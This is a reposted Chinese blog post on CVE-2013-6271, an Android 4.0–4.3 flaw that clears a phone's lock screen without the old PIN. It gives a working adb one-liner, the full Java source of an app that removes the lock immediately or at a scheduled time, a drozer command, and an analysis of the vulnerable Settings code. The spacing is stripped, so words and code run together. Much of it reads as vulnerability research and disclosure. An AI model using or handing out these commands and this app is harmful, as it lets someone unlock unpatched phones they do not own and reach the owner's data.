您的位置:首页 > 移动开发 > Android开发

android绕过设备锁(device lock)

2013-12-02 21:50 302 查看
听说这几天爆了一个Norootnorecovery的devicelock的漏洞。

来源:https://cureblog.de/2013/11/cve-2013-6271-remove-device-locks-from-android-phone/

受伤程度。

4.0-vulnerable
4.1-vulnerable
4.2-vulnerable
4.3-vulnerable
4.4-notvulnerable


有兴趣的读者可以先看看:http://developer.android.com/guide/topics/admin/device-admin.html

1、测试

测试一下:先设置devicepin:



只需要一行代码:

adbshellamstart-ncom.android.settings/com.android.settings.ChooseLockGeneric--ezconfirm_credentialsfalse--eilockscreen.password_type0--activity-clear-task

devicepin真的消失了。





有人也把这个功能封装到app里面了。无需adb了。

CRT-Removelocks.apk

CRT-RemovelocksSourcecode

packagecom.curesec.android;

importandroid.app.IntentService;

importandroid.content.ComponentName;

importandroid.content.Intent;

importandroid.os.IBinder;

publicclassRemoveLocksextendsIntentService{

publicRemoveLocks(){

super("RemoveLocks");

}

@Override

protectedvoidonHandleIntent(Intentintent){

removeLocks();

}

看懂这段就看懂了全部!就是如何让锁消失的秘密!

privatevoidremoveLocks(){

Intentintent=newIntent();

intent.setComponent(newComponentName("com.android.settings","com.android.settings.ChooseLockGeneric"));

intent.putExtra("confirm_credentials",false);

intent.putExtra("lockscreen.password_type",0);//这就是那个
PASSWORD_QUALITY_UNSPECIFIED
The
policyhasnorequirementsforthepassword.

intent.setFlags(intent.FLAG_ACTIVITY_NEW_TASK);

startActivity(intent);

}

@Override

publicIBinderonBind(Intentintent){

returnnull;

}

}

packagecom.curesec.android;

importjava.util.Calendar;

importandroid.app.Activity;

importandroid.app.AlarmManager;

importandroid.app.PendingIntent;

importandroid.content.Context;

importandroid.content.Intent;

importandroid.os.Bundle;

importandroid.view.Menu;

importandroid.view.View;

importandroid.widget.Button;

importandroid.widget.TimePicker;

importandroid.widget.Toast;

publicclassMainActivityextendsActivity{

@Override

protectedvoidonCreate(BundlesavedInstanceState){

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

ButtonbuttonExecuteNow=(Button)findViewById(R.id.button1);

ButtonbuttonExecuteLater=(Button)findViewById(R.id.button2);

TimePickertp=(TimePicker)findViewById(R.id.timePicker1);

tp.setIs24HourView(true);

tp.setCurrentHour(Calendar.getInstance().get(Calendar.HOUR_OF_DAY));

buttonExecuteNow.setOnClickListener(newView.OnClickListener(){

publicvoidonClick(Viewview){

Contextcontext=getBaseContext();

Intentintent=newIntent(context,RemoveLocks.class);

AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);

PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);

Calendarcal=Calendar.getInstance();

alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);

Toastt=Toast.makeText(getBaseContext(),"Removinglocknow!",5);

t.show();

}

}

);

buttonExecuteLater.setOnClickListener(newView.OnClickListener(){

publicvoidonClick(Viewview){

Contextcontext=getBaseContext();

Intentintent=newIntent(context,RemoveLocks.class);

AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);

PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);

Calendarcal=Calendar.getInstance();

TimePickertp=(TimePicker)findViewById(R.id.timePicker1);

cal.set(Calendar.HOUR_OF_DAY,tp.getCurrentHour());

cal.set(Calendar.MINUTE,tp.getCurrentMinute());

cal.set(Calendar.SECOND,0);

alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);

Toastt=Toast.makeText(getBaseContext(),"Removinglockat:"+tp.getCurrentHour()+":"+tp.getCurrentMinute(),5);

t.show();

}

}

);

}

@Override

publicbooleanonCreateOptionsMenu(Menumenu){

getMenuInflater().inflate(R.menu.main,menu);

returntrue;

}

}

也可以使用drozer进行验证。drozer(原名Mercury)您不会不知道吧!

#Disableallphonelocks
runapp.activity.start--componentcom.android.settingscom.android.settings.ChooseLockGeneric--extrabooleanconfirm_credentialsfalse--extrainteger"lockscreen.password_type"0
[/code]


2、原因:

com.android.settings.ChooseLockGenericclass用于让用户改变设备锁类型,比如是password,gestureandevenfacerecognition,当然修改前需要输入原来的密码(pin、图案等)

Letsexaminethefollowingcodeextractedfromtheclass:
//Defaultstoneedingtoconfirmcredentials
finalbooleanconfirmCredentials=getActivity().getIntent()
.getBooleanExtra(CONFIRM_CREDENTIALS,true);
mPasswordConfirmed=!confirmCredentials;

if(savedInstanceState!=null){
mPasswordConfirmed=savedInstanceState.getBoolean(PASSWORD_CONFIRMED);
mWaitingForConfirmation=savedInstanceState.getBoolean(WAITING_FOR_CONFIRMATION);
mFinishPending=savedInstanceState.getBoolean(FINISH_PENDING);
}

if(mPasswordConfirmed){
updatePreferencesOrFinish();
}
…...
privatevoidupdatePreferencesOrFinish(){
Intentintent=getActivity().getIntent();
intquality=intent.getIntExtra(LockPatternUtils.PASSWORD_TYPE_KEY,-1);
if(quality==-1){
//Ifcallerdidn'tspecifypasswordquality,showUIandallowtheusertochoose.
quality=intent.getIntExtra(MINIMUM_QUALITY_KEY,-1);
MutableBooleanallowBiometric=newMutableBoolean(false);
quality=upgradeQuality(quality,allowBiometric);
finalPreferenceScreenprefScreen=getPreferenceScreen();
if(prefScreen!=null){
prefScreen.removeAll();
}
addPreferencesFromResource(R.xml.security_settings_picker);
disableUnusablePreferences(quality,allowBiometric);
}else{
updateUnlockMethodAndFinish(quality,false);
}
}

…...
voidupdateUnlockMethodAndFinish(intquality,booleandisabled){
//Sanitycheck.Weshouldnevergetherewithoutconfirminguser'sexistingpassword.
if(!mPasswordConfirmed){
thrownewIllegalStateException("Triedtoupdatepasswordwithoutconfirmingit");
}

finalbooleanisFallback=getActivity().getIntent()
.getBooleanExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,false);

quality=upgradeQuality(quality,null);

if(quality>=DevicePolicyManager.PASSWORD_QUALITY_NUMERIC){
intminLength=mDPM.getPasswordMinimumLength(null);
if(minLength<MIN_PASSWORD_LENGTH){
minLength=MIN_PASSWORD_LENGTH;
}
finalintmaxLength=mDPM.getPasswordMaximumLength(quality);
Intentintent=newIntent().setClass(getActivity(),ChooseLockPassword.class);
intent.putExtra(LockPatternUtils.PASSWORD_TYPE_KEY,quality);
intent.putExtra(ChooseLockPassword.PASSWORD_MIN_KEY,minLength);
intent.putExtra(ChooseLockPassword.PASSWORD_MAX_KEY,maxLength);
intent.putExtra(CONFIRM_CREDENTIALS,false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if(isFallback){
startActivityForResult(intent,FALLBACK_REQUEST);
return;
}else{
mFinishPending=true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
}elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_SOMETHING){
Intentintent=newIntent(getActivity(),ChooseLockPattern.class);
intent.putExtra("key_lock_method","pattern");
intent.putExtra(CONFIRM_CREDENTIALS,false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if(isFallback){
startActivityForResult(intent,FALLBACK_REQUEST);
return;
}else{
mFinishPending=true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_BIOMETRIC_WEAK){
Intentintent=getBiometricSensorIntent();
mFinishPending=true;
startActivity(intent);
}elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED){
mChooseLockSettingsHelper.utils().clearLock(false);
mChooseLockSettingsHelper.utils().setLockScreenDisabled(disabled);
getActivity().setResult(Activity.RESULT_OK);
finish();
}else{
finish();
}
}

Thisfirstpieceofcodeallowsthecallertoactuallycontroliftheconfirmationtochangethelockmechanismisenableornot.

第一部分代码允许调用者设置改变设备锁类型前是否需要输入以前的设备所认证。


WecancontroltheflowtoreachtheupdatePreferencesOrFinish()methodandseethatIFweprovideaPasswordTypetheflowcontinuestoupdateUnlockMethodAndFinish().AbovewecanseethatIFthepasswordisoftypePASSWORD_QUALITY_UNSPECIFIEDthecodethatgetsexecutedandeffectivelyunblocksthedevice.


构造输入即可绕过。

Setthepasswordquality
Thepasswordqualitycanbeoneofthefollowing
DevicePolicyManager
constants:

PASSWORD_QUALITY_ALPHABETIC
Theusermustenterapasswordcontainingatleastalphabetic(orothersymbol)characters.
PASSWORD_QUALITY_ALPHANUMERIC
Theusermustenterapasswordcontainingatleastbothnumeric
andalphabetic(orothersymbol)characters.
PASSWORD_QUALITY_NUMERIC
Theusermustenterapasswordcontainingatleastnumericcharacters.
PASSWORD_QUALITY_SOMETHING
Thepolicyrequiressomekindofpassword,butdoesn'tcarewhatitis.
PASSWORD_QUALITY_UNSPECIFIED
Thepolicyhasnorequirementsforthepassword.

3、危害:

1、如果丢了手机,pin起码有一定保护作用,如果用户开启了adbshell,那就可以被干掉pin了。

2、4.2.2以后还有安全机制:adb认证。/article/7616003.html丢了手机,想执行adb好难哦!



3、被app执行该漏洞,清除了devicepin!有啥后果呢?没想好!

接下来我们系统分析一下设备锁的机制,以及还有哪些其它方法清除设备锁。

看完电影对devicelock进行深入系统分析。

http://we.droidiser.com/viewtopic.php?f=21&t=29

http://en.miui.com/thread-5684-1-1.html

http://oscarmini.com/2013/09/locked-out-how-to-bypass-pattern-lock-on-any-android-device.html


http://www.geeknaut.com/bypass-android-pattern-lock-09198931.html

http://forum.xda-developers.com/showthread.php?t=1722950

http://forum.xda-developers.com/showthread.php?t=2225695

http://forum.xda-developers.com/showthread.php?t=1646108

http://forum.xda-developers.com/showthread.php?t=2225695

http://forum.xda-developers.com/showthread.php?t=2437946

http://www.morethantechnical.com/2013/01/29/a-creative-way-to-bypass-pattern-lock-on-android/
                                            

                                        

                        
                        内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息 
                    

                    

                    

                        

                         标签: 
                                                

                        

                    


                

            


            

                
相关文章推荐

                

                
            

        

        

            

            
            

                

                    
新的分享

                    

                        
                    

                

            


            

                

                    
章节导航